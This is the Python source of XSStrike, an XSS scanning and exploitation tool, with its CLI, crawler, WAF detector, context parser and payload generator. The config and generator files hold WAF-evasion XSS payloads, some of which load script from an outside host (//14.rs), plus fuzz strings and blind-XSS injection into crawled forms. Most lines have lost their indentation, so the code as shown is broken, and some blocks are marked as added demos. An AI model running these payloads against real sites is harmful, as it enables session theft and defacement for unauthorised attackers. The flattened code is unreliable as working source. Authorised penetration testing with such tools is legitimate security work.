Repository: XSStrike
Commit: f29278760453996c713af908376d6dab24e61692

File: xsstrike.py
#!/usr/bin/env python3
from __future__ import print_function
from core.colors import end, red, white, bad, info
# Just a fancy ass banner
print('''%s
\tXSStrike %sv3.1.5
%s''' % (red, white, end))
try:
import concurrent.futures
from urllib.parse import urlparse
try:
import fuzzywuzzy
except ImportError:
import os
print ('%s fuzzywuzzy isn\'t installed, installing now.' % info)
ret_code = os.system('pip3 install fuzzywuzzy')
if(ret_code != 0):
print('%s fuzzywuzzy installation failed.' % bad)
quit()
print ('%s fuzzywuzzy has been installed, restart XSStrike.' % info)
quit()
except ImportError: # throws error in python2
print('%s XSStrike isn\'t compatible with python2.\n Use python > 3.4 to run XSStrike.' % bad)
quit()
# Let's import whatever we need from standard lib
import sys
import json
import argparse
# ... and configurations core lib
import core.config
import core.log
# Processing command line arguments, where dest var names will be mapped to local vars with the same name
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='url', dest='target')
parser.add_argument('--data', help='post data', dest='paramData')
parser.add_argument('-e', '--encode', help='encode payloads', dest='encode')
parser.add_argument('--fuzzer', help='fuzzer',
dest='fuzz', action='store_true')
parser.add_argument('--update', help='update',
dest='update', action='store_true')
parser.add_argument('--timeout', help='timeout',
dest='timeout', type=int, default=core.config.timeout)
parser.add_argument('--proxy', help='use prox(y|ies)',
dest='proxy', action='store_true')
parser.add_argument('--crawl', help='crawl',
dest='recursive', action='store_true')
parser.add_argument('--json', help='treat post data as json',
dest='jsonData', action='store_true')
parser.add_argument('--path', help='inject payloads in the path',
dest='path', action='store_true')
parser.add_argument(
'--seeds', help='load crawling seeds from a file', dest='args_seeds')
parser.add_argument(
'-f', '--file', help='load payloads from a file', dest='args_file')
parser.add_argument('-l', '--level', help='level of crawling',
dest='level', type=int, default=2)
parser.add_argument('--headers', help='add headers',
dest='add_headers', nargs='?', const=True)
parser.add_argument('-t', '--threads', help='number of threads',
dest='threadCount', type=int, default=core.config.threadCount)
parser.add_argument('-d', '--delay', help='delay between requests',
dest='delay', type=int, default=core.config.delay)
parser.add_argument('--skip', help='don\'t ask to continue',
dest='skip', action='store_true')
parser.add_argument('--skip-dom', help='skip dom checking',
dest='skipDOM', action='store_true')
parser.add_argument('--blind', help='inject blind XSS payload while crawling',
dest='blindXSS', action='store_true')
parser.add_argument('--console-log-level', help='Console logging level',
dest='console_log_level', default=core.log.console_log_level,
choices=core.log.log_config.keys())
parser.add_argument('--file-log-level', help='File logging level', dest='file_log_level',
choices=core.log.log_config.keys(), default=None)
parser.add_argument('--log-file', help='Name of the file to log', dest='log_file',
default=core.log.log_file)
args = parser.parse_args()
# Pull all parameter values of dict from argparse namespace into local variables of name == key
# The following works, but the static checkers are too static ;-) locals().update(vars(args))
target = args.target
path = args.path
jsonData = args.jsonData
paramData = args.paramData
encode = args.encode
fuzz = args.fuzz
update = args.update
timeout = args.timeout
proxy = args.proxy
recursive = args.recursive
args_file = args.args_file
args_seeds = args.args_seeds
level = args.level
add_headers = args.add_headers
threadCount = args.threadCount
delay = args.delay
skip = args.skip
skipDOM = args.skipDOM
blindXSS = args.blindXSS
core.log.console_log_level = args.console_log_level
core.log.file_log_level = args.file_log_level
core.log.log_file = args.log_file
logger = core.log.setup_logger()
core.config.globalVariables = vars(args)
# Import everything else required from core lib
from core.config import blindPayload
from core.encoders import base64
from core.photon import photon
from core.prompt import prompt
from core.updater import updater
from core.utils import extractHeaders, reader, converter
from modes.bruteforcer import bruteforcer
from modes.crawl import crawl
from modes.scan import scan
from modes.singleFuzz import singleFuzz
if isinstance(args.add_headers, bool):
    headers = extractHeaders(prompt())
elif isinstance(args.add_headers, str):
    headers = extractHeaders(args.add_headers)
else:
from core.config import headers
core.config.globalVariables['headers'] = headers
core.config.globalVariables['checkedScripts'] = set()
core.config.globalVariables['checkedForms'] = {}
core.config.globalVariables['definitions'] = json.loads('\n'.join(reader(sys.path[0] + '/db/definitions.json')))
if path:
paramData = converter(target, target)
elif jsonData:
headers['Content-type'] = 'application/json'
paramData = converter(paramData)
if args_file:
if args_file == 'default':
payloadList = core.config.payloads
else:
payloadList = list(filter(None, reader(args_file)))
seedList = []
if args_seeds:
seedList = list(filter(None, reader(args_seeds)))
encoding = base64 if encode == 'base64' else False
if not proxy:
core.config.proxies = {}
if update: # if the user has supplied --update argument
updater()
quit() # quitting because files have been changed
if not target and not args_seeds: # if the user hasn't supplied a url
logger.no_format('\n' + parser.format_help().lower())
quit()
if fuzz:
singleFuzz(target, paramData, encoding, headers, delay, timeout)
elif not recursive and not args_seeds:
if args_file:
bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout)
else:
scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip)
else:
if target:
seedList.append(target)
for target in seedList:
logger.run('Crawling the target')
scheme = urlparse(target).scheme
logger.debug('Target scheme: {}'.format(scheme))
host = urlparse(target).netloc
main_url = scheme + '://' + host
crawlingResult = photon(target, headers, level,
threadCount, delay, timeout, skipDOM)
forms = crawlingResult[0]
domURLs = list(crawlingResult[1])
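        # pad the shorter list with zeros so zip() pairs every form with a domURL slot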
difference = abs(len(domURLs) - len(forms))
if len(domURLs) > len(forms):
for i in range(difference):
forms.append(0)
elif len(forms) > len(domURLs):
for i in range(difference):
domURLs.append(0)
threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount)
futures = (threadpool.submit(crawl, scheme, host, main_url, form,
blindXSS, blindPayload, headers, delay, timeout, encoding) for form, domURL in zip(forms, domURLs))
for i, _ in enumerate(concurrent.futures.as_completed(futures)):
if i + 1 == len(forms) or (i + 1) % threadCount == 0:
logger.info('Progress: %i/%i\r' % (i + 1, len(forms)))
logger.no_format('')
File: core/zetanize.py
import re
def zetanize(response):
def e(string):
return string.encode('utf-8')
def d(string):
return string.decode('utf-8')
# remove the content between html comments
response = re.sub(r'(?s)<!--.*?-->', '', response)
forms = {}
matches = re.findall(r'(?i)(?s)<form.*?</form.*?>',
response) # extract all the forms
num = 0
for match in matches: # everything else is self explanatory if you know regex
page = re.search(r'(?i)action=[\'"](.*?)[\'"]', match)
method = re.search(r'(?i)method=[\'"](.*?)[\'"]', match)
forms[num] = {}
forms[num]['action'] = d(e(page.group(1))) if page else ''
forms[num]['method'] = d(
e(method.group(1)).lower()) if method else 'get'
forms[num]['inputs'] = []
        inputs = re.findall(r'(?i)(?s)<input.*?>', match)  # only the inputs inside this form
for inp in inputs:
inpName = re.search(r'(?i)name=[\'"](.*?)[\'"]', inp)
if inpName:
inpType = re.search(r'(?i)type=[\'"](.*?)[\'"]', inp)
inpValue = re.search(r'(?i)value=[\'"](.*?)[\'"]', inp)
inpName = d(e(inpName.group(1)))
                inpType = d(e(inpType.group(1))) if inpType else ''
inpValue = d(e(inpValue.group(1))) if inpValue else ''
if inpType.lower() == 'submit' and inpValue == '':
inpValue = 'Submit Query'
inpDict = {
'name': inpName,
'type': inpType,
'value': inpValue
}
forms[num]['inputs'].append(inpDict)
num += 1
return forms
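
# Hedged demo (not part of upstream): zetanize is pure string processing, so a
# minimal page can be parsed offline with `python core/zetanize.py`.
if __name__ == '__main__':
    sample = '<form action="/search" method="post"><input type="text" name="q" value=""></form>'
    print(zetanize(sample))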
File: core/wafDetector.py
import json
import re
import sys
from core.requester import requester
from core.log import setup_logger
logger = setup_logger(__name__)
def wafDetector(url, params, headers, GET, delay, timeout):
with open(sys.path[0] + '/db/wafSignatures.json', 'r') as file:
wafSignatures = json.load(file)
# a payload which is noisy enough to provoke the WAF
noise = '<script>alert("XSS")</script>'
params['xss'] = noise
# Opens the noise injected payload
response = requester(url, params, headers, GET, delay, timeout)
page = response.text
code = str(response.status_code)
headers = str(response.headers)
logger.debug('Waf Detector code: {}'.format(code))
logger.debug_json('Waf Detector headers:', response.headers)
if int(code) >= 400:
bestMatch = [0, None]
for wafName, wafSignature in wafSignatures.items():
score = 0
pageSign = wafSignature['page']
codeSign = wafSignature['code']
headersSign = wafSignature['headers']
if pageSign:
if re.search(pageSign, page, re.I):
score += 1
if codeSign:
if re.search(codeSign, code, re.I):
score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators
if headersSign:
if re.search(headersSign, headers, re.I):
score += 1
# if the overall score of the waf is higher than the previous one
if score > bestMatch[0]:
del bestMatch[:] # delete the previous one
bestMatch.extend([score, wafName]) # and add this one
if bestMatch[0] != 0:
return bestMatch[1]
else:
return None
else:
return None
File: core/config.py
changes = '''Negligible DOM XSS false positives;x10 faster crawling'''
globalVariables = {} # it holds variables during runtime for collaboration across modules
defaultEditor = 'nano'
blindPayload = '' # your blind XSS payload
xsschecker = 'v3dm0s' # a non-malicious string used to check for reflections
# More information on adding proxies: http://docs.python-requests.org/en/master/user/advanced/#proxies
proxies = {'http': 'http://0.0.0.0:8080', 'https': 'http://0.0.0.0:8080'}
minEfficiency = 90 # payloads below this efficiency will not be displayed
delay = 0 # default delay between http requests
threadCount = 10 # default number of threads
timeout = 10 # default http request timeout in seconds
# attributes that have special properties
specialAttributes = ['srcdoc', 'src']
badTags = ('iframe', 'title', 'textarea', 'noembed',
'style', 'template', 'noscript')
tags = ('html', 'd3v', 'a', 'details') # HTML Tags
# "Things" that can be used between js functions and breakers e.g. '};alert()//
jFillings = (';',)  # note the comma: a one-element tuple, not a bare string
# "Things" that can be used before > e.g. <tag attr=value%0dx>
lFillings = ('', '%0dx')
# "Things" to use between event handler and = or between function and =
eFillings = ('%09', '%0a', '%0d', '+')
fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space
eventHandlers = { # Event handlers and the tags compatible with them
'ontoggle': ['details'],
'onpointerenter': ['d3v', 'details', 'html', 'a'],
'onmouseover': ['a', 'html', 'd3v']
}
functions = ( # JavaScript functions to get a popup
'[8].find(confirm)', 'confirm()',
'(confirm)()', 'co\u006efir\u006d()',
'(prompt)``', 'a=prompt,a()')
payloads = ( # Payloads for filter & WAF evasion
'\'"</Script><Html Onmouseover=(confirm)()//'
'<imG/sRc=l oNerrOr=(prompt)() x>',
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
'<deTails open oNToggle=confi\u0072m()>',
'<img sRc=l oNerrOr=(confirm)() x>',
'<svg/x=">"/onload=confirm()//',
'<svg%0Aonload=%09((pro\u006dpt))()//',
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
'<sCript x>confirm``</scRipt x>',
'<Script x>prompt()</scRiPt x>',
'<sCriPt sRc=//14.rs>',
'<embed//sRc=//14.rs>',
'<base href=//14.rs/><script src=/>',
'<object//data=//14.rs>',
'<s=" onclick=confirm``>clickme',
'<svG oNLoad=co\u006efirm(1)>',
'\'"><y///oNMousEDown=((confirm))()>Click',
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
'<img src=x onerror=confir\u006d`1`>',
'<svg/onload=co\u006efir\u006d`1`>')
fuzzes = ( # Fuzz strings to test WAFs
'<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')
headers = { # default headers
    'User-Agent': '$',  # '$' is replaced by requester() with a random User-Agent
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'DNT': '1',
'Upgrade-Insecure-Requests': '1',
}
blindParams = [ # common parameter names to be bruteforced for parameter discovery
'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
'height', 'add', 'result', 'log', 'demo', 'example', 'message']
File: core/htmlParser.py
import re
from core.config import badTags, xsschecker
from core.utils import isBadContext, equalize, escaped, extractScripts
def htmlParser(response, encoding):
rawResponse = response # raw response returned by requests
response = response.text # response content
if encoding: # if the user has specified an encoding, encode the probe in that
response = response.replace(encoding(xsschecker), xsschecker)
reflections = response.count(xsschecker)
position_and_context = {}
environment_details = {}
clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response)
script_checkable = clean_response
for script in extractScripts(script_checkable):
occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
if occurences:
for occurence in occurences:
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'script'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'quote' : ''}
for i in range(len(occurence.group())):
currentChar = occurence.group()[i]
if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
environment_details[thisPosition]['details']['quote'] = currentChar
                    elif currentChar in (')', ']', '}') and not escaped(i, occurence.group()):
break
script_checkable = script_checkable.replace(xsschecker, '', 1)
if len(position_and_context) < reflections:
attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)
for occurence in attribute_context:
match = occurence.group(0)
thisPosition = occurence.start(1)
parts = re.split(r'\s', match)
tag = parts[0][1:]
for part in parts:
if xsschecker in part:
Type, quote, name, value = '', '', '', ''
if '=' in part:
quote = re.search(r'=([\'`"])?', part).group(1)
name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])
if xsschecker == name_and_value[0]:
Type = 'name'
else:
Type = 'value'
name = name_and_value[0]
value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
else:
Type = 'flag'
position_and_context[thisPosition] = 'attribute'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name}
if len(position_and_context) < reflections:
html_context = re.finditer(xsschecker, clean_response)
for occurence in html_context:
thisPosition = occurence.start()
if thisPosition not in position_and_context:
position_and_context[occurence.start()] = 'html'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
if len(position_and_context) < reflections:
comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response)
for occurence in comment_context:
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'comment'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
database = {}
for i in sorted(position_and_context):
database[i] = {}
database[i]['position'] = i
database[i]['context'] = position_and_context[i]
database[i]['details'] = environment_details[i]['details']
bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
non_executable_contexts = []
for each in bad_contexts:
non_executable_contexts.append([each.start(), each.end(), each.group(1)])
if non_executable_contexts:
for key in database.keys():
position = database[key]['position']
badTag = isBadContext(position, non_executable_contexts)
if badTag:
database[key]['details']['badTag'] = badTag
else:
database[key]['details']['badTag'] = ''
return database
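
# Hedged demo (not part of upstream): htmlParser only reads the .text attribute
# of the response, so a hypothetical stub object is enough to inspect the
# context detection offline (run as `python -m core.htmlParser` from the repo root).
if __name__ == '__main__':
    class _FakeResponse:  # hypothetical stand-in for requests.Response
        text = '<a href="v3dm0s">v3dm0s</a>'
    print(htmlParser(_FakeResponse(), False))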
File: core/log.py
import logging
import sys
from .colors import *
__all__ = ['setup_logger', 'console_log_level', 'file_log_level', 'log_file']
console_log_level = 'INFO'
file_log_level = None
log_file = 'xsstrike.log'
"""
Default Logging Levels
CRITICAL = 50
ERROR = 40
WARNING = 30
INFO = 20
DEBUG = 10
"""
VULN_LEVEL_NUM = 60
RUN_LEVEL_NUM = 22
GOOD_LEVEL_NUM = 25
logging.addLevelName(VULN_LEVEL_NUM, 'VULN')
logging.addLevelName(RUN_LEVEL_NUM, 'RUN')
logging.addLevelName(GOOD_LEVEL_NUM, 'GOOD')
def _vuln(self, msg, *args, **kwargs):
if self.isEnabledFor(VULN_LEVEL_NUM):
self._log(VULN_LEVEL_NUM, msg, args, **kwargs)
def _run(self, msg, *args, **kwargs):
if self.isEnabledFor(RUN_LEVEL_NUM):
self._log(RUN_LEVEL_NUM, msg, args, **kwargs)
def _good(self, msg, *args, **kwargs):
if self.isEnabledFor(GOOD_LEVEL_NUM):
self._log(GOOD_LEVEL_NUM, msg, args, **kwargs)
logging.Logger.vuln = _vuln
logging.Logger.run = _run
logging.Logger.good = _good
log_config = {
'DEBUG': {
'value': logging.DEBUG,
'prefix': '{}[*]{}'.format(yellow, end),
},
'INFO': {
'value': logging.INFO,
'prefix': info,
},
'RUN': {
'value': RUN_LEVEL_NUM,
'prefix': run,
},
'GOOD': {
'value': GOOD_LEVEL_NUM,
'prefix': good,
},
'WARNING': {
'value': logging.WARNING,
        'prefix': '{}[!!]{}'.format(yellow, end),
},
'ERROR': {
'value': logging.ERROR,
'prefix': bad,
},
'CRITICAL': {
'value': logging.CRITICAL,
'prefix': '{}[--]{}'.format(red, end),
},
'VULN': {
'value': VULN_LEVEL_NUM,
'prefix': '{}[++]{}'.format(green, red),
}
}
class CustomFormatter(logging.Formatter):
def format(self, record):
msg = super().format(record)
if record.levelname in log_config.keys():
msg = '%s %s %s' % (log_config[record.levelname]['prefix'], msg, end)
return msg
class CustomStreamHandler(logging.StreamHandler):
default_terminator = '\n'
def emit(self, record):
"""
        Overrides emit method to temporarily update the terminator character when the last character of the log record is '\r'
:param record:
:return:
"""
if record.msg.endswith('\r'):
self.terminator = '\r'
super().emit(record)
self.terminator = self.default_terminator
else:
super().emit(record)
def _switch_to_no_format_loggers(self):
self.removeHandler(self.console_handler)
self.addHandler(self.no_format_console_handler)
if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'):
self.removeHandler(self.file_handler)
self.addHandler(self.no_format_file_handler)
def _switch_to_default_loggers(self):
self.removeHandler(self.no_format_console_handler)
self.addHandler(self.console_handler)
if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'):
self.removeHandler(self.no_format_file_handler)
self.addHandler(self.file_handler)
def _get_level_and_log(self, msg, level):
if level.upper() in log_config.keys():
log_method = getattr(self, level.lower())
log_method(msg)
else:
self.info(msg)
def log_red_line(self, amount=60, level='INFO'):
_switch_to_no_format_loggers(self)
_get_level_and_log(self, red + ('-' * amount) + end, level)
_switch_to_default_loggers(self)
def log_no_format(self, msg='', level='INFO'):
_switch_to_no_format_loggers(self)
_get_level_and_log(self, msg, level)
_switch_to_default_loggers(self)
def log_debug_json(self, msg='', data={}):
if self.isEnabledFor(logging.DEBUG):
if isinstance(data, dict):
import json
try:
self.debug('{} {}'.format(msg, json.dumps(data, indent=2)))
except TypeError:
self.debug('{} {}'.format(msg, data))
else:
self.debug('{} {}'.format(msg, data))
def setup_logger(name='xsstrike'):
from types import MethodType
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
console_handler = CustomStreamHandler(sys.stdout)
console_handler.setLevel(log_config[console_log_level]['value'])
console_handler.setFormatter(CustomFormatter('%(message)s'))
logger.addHandler(console_handler)
    # Setup blank handler to temporarily use to log without format
no_format_console_handler = CustomStreamHandler(sys.stdout)
no_format_console_handler.setLevel((log_config[console_log_level]['value']))
no_format_console_handler.setFormatter(logging.Formatter(fmt=''))
# Store current handlers
logger.console_handler = console_handler
logger.no_format_console_handler = no_format_console_handler
if file_log_level:
detailed_formatter = logging.Formatter('%(asctime)s %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(log_config[file_log_level]['value'])
file_handler.setFormatter(detailed_formatter)
logger.addHandler(file_handler)
        # Setup blank handler to temporarily use to log without format
no_format_file_handler = logging.FileHandler(log_file)
no_format_file_handler.setLevel(log_config[file_log_level]['value'])
no_format_file_handler.setFormatter(logging.Formatter(fmt=''))
# Store file handlers
logger.file_handler = file_handler
logger.no_format_file_handler = no_format_file_handler
# Create logger method to only log a red line
logger.red_line = MethodType(log_red_line, logger)
# Create logger method to log without format
logger.no_format = MethodType(log_no_format, logger)
# Create logger method to convert data to json and log with debug level
logger.debug_json = MethodType(log_debug_json, logger)
return logger
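
# Hedged demo (not part of upstream): the custom RUN/GOOD/VULN levels in action
# (run as `python -m core.log` from the repo root).
if __name__ == '__main__':
    demo_logger = setup_logger('demo')
    demo_logger.run('crawling started')
    demo_logger.good('payload reflected')
    demo_logger.vuln('vulnerable parameter found')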
File: core/__init__.py
File: core/encoders.py
import base64 as b64
import re
def base64(string):
if re.match(r'^[A-Za-z0-9+\/=]+$', string) and (len(string) % 4) == 0:
return b64.b64decode(string.encode('utf-8')).decode('utf-8')
else:
return b64.b64encode(string.encode('utf-8')).decode('utf-8')
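
# Hedged demo (not part of upstream): the same function both encodes and
# decodes, choosing by whether the input already looks like valid base64.
if __name__ == '__main__':
    encoded = base64('<svg onload=alert()>')  # plain text in -> base64 out
    print(encoded)
    print(base64(encoded))  # valid base64 in -> decoded text out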
File: core/requester.py
import random
import requests
import time
from urllib3.exceptions import ProtocolError
import warnings
import core.config
from core.utils import converter, getVar
from core.log import setup_logger
logger = setup_logger(__name__)
warnings.filterwarnings('ignore') # Disable SSL related warnings
def requester(url, data, headers, GET, delay, timeout):
if getVar('jsonData'):
data = converter(data)
elif getVar('path'):
url = converter(data, url)
data = []
GET, POST = True, False
time.sleep(delay)
user_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991']
if 'User-Agent' not in headers:
headers['User-Agent'] = random.choice(user_agents)
elif headers['User-Agent'] == '$':
headers['User-Agent'] = random.choice(user_agents)
logger.debug('Requester url: {}'.format(url))
logger.debug('Requester GET: {}'.format(GET))
logger.debug_json('Requester data:', data)
logger.debug_json('Requester headers:', headers)
try:
if GET:
response = requests.get(url, params=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
elif getVar('jsonData'):
response = requests.post(url, json=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
else:
response = requests.post(url, data=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
return response
    except ProtocolError:
        logger.warning('WAF is dropping suspicious requests.')
        logger.warning('Scanning will continue after 10 minutes.')
        time.sleep(600)
        return requester(url, data, headers, GET, delay, timeout)  # retry once the cooldown is over
except Exception as e:
logger.warning('Unable to connect to the target.')
return requests.Response()
File: core/updater.py
import os
import re
from requests import get
from core.config import changes
from core.colors import que, info, end, green
from core.log import setup_logger
logger = setup_logger(__name__)
def updater():
logger.run('Checking for updates')
latestCommit = get(
'https://raw.githubusercontent.com/s0md3v/XSStrike/master/core/config.py').text
if changes not in latestCommit: # just a hack to see if a new version is available
changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
changelog = changelog.group(1).split(
';') # splitting the changes to form a list
logger.good('A new version of XSStrike is available.')
changes_str = 'Changes:\n'
for change in changelog: # prepare changes to print
changes_str += '%s>%s %s\n' % (green, end, change)
logger.info(changes_str)
currentPath = os.getcwd().split('/') # if you know it, you know it
folder = currentPath[-1] # current directory name
path = '/'.join(currentPath) # current directory path
choice = input('%s Would you like to update? [Y/n] ' % que).lower()
if choice != 'n':
logger.run('Updating XSStrike')
os.system(
'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' %
(path, folder, path, path, folder))
logger.good('Update successful!')
else:
logger.good('XSStrike is up to date!')
File: core/generator.py
from core.config import xsschecker, badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
for i in occurences:
context = occurences[i]['context']
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, badTag)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
found = False
tag = occurences[i]['details']['tag']
Type = occurences[i]['details']['type']
quote = occurences[i]['details']['quote'] or ''
attributeName = occurences[i]['details']['name']
attributeValue = occurences[i]['details']['value']
quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and quoteEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + payload
found = True
vectors[9].add(payload)
if quoteEfficiency == 100:
for filling in fillings:
for function in functions:
vector = quote + filling + r('autofocus') + \
filling + r('onfocus') + '=' + quote + function
found = True
vectors[8].add(vector)
if quoteEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + quote + filling + r('autofocus') + filling + \
r('onfocus') + '=' + function + filling + '\\' + quote
found = True
vectors[7].add(vector)
if Type == 'value':
if attributeName == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
del ends[:]
ends.append('%26gt;')
payloads = genGen(
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
elif attributeName == 'href' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif attributeName.startswith('on'):
closer = jsContexter(attributeValue)
quote = ''
for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']:
quote = char
break
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
if quoteEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = '\\' + quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif tag in ('script', 'iframe', 'embed', 'object'):
if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:
payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
for payload in payloads:
vectors[10].add(payload)
elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif quoteEfficiency == greatBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + r('</script/>') + payload
found = True
vectors[11].add(payload)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
quote = occurences[i]['details']['quote']
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = 100
if quote:
breakerEfficiency = occurences[i]['score'][quote]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
prefix = ''
suffix = '//'
if breakerEfficiency != 100:
prefix = '\\'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = prefix + quote + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
File: core/utils.py
import json
import random
import re
from urllib.parse import urlparse
import core.config
from core.config import xsschecker
def converter(data, url=False):
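    # Four modes: str + url -> dict built from the url's path segments; plain
    # str -> dict parsed from JSON; dict + url -> path-style url rebuilt from
    # the dict values; plain dict -> JSON string.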
    if isinstance(data, str):
if url:
dictized = {}
parts = data.split('/')[3:]
for part in parts:
dictized[part] = part
return dictized
else:
return json.loads(data)
else:
if url:
url = urlparse(url).scheme + '://' + urlparse(url).netloc
for part in list(data.values()):
url += '/' + part
return url
else:
return json.dumps(data)
def counter(string):
string = re.sub(r'\s|\w', '', string)
return len(string)
def closest(number, numbers):
